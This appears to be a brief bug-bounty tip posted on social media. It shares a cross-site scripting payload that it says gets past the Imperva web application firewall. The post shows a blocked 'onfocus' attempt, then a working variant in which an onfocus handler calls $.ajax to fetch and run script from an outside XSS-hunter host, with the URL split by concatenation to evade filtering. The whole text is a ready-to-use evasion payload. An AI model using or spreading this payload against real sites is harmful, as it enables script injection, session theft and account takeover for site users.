+ onfocus=xxxx –> Blocked
+ onfocus=$.ajax({url:’http://’.concat(‘yourxsshunder .xss.ht’),dataType:’script’,success:’success’}) –> Boom!
@Hacker0x01 #XSS #bugbountytips bypass Imperva https://t.co/dB0DwQFDEl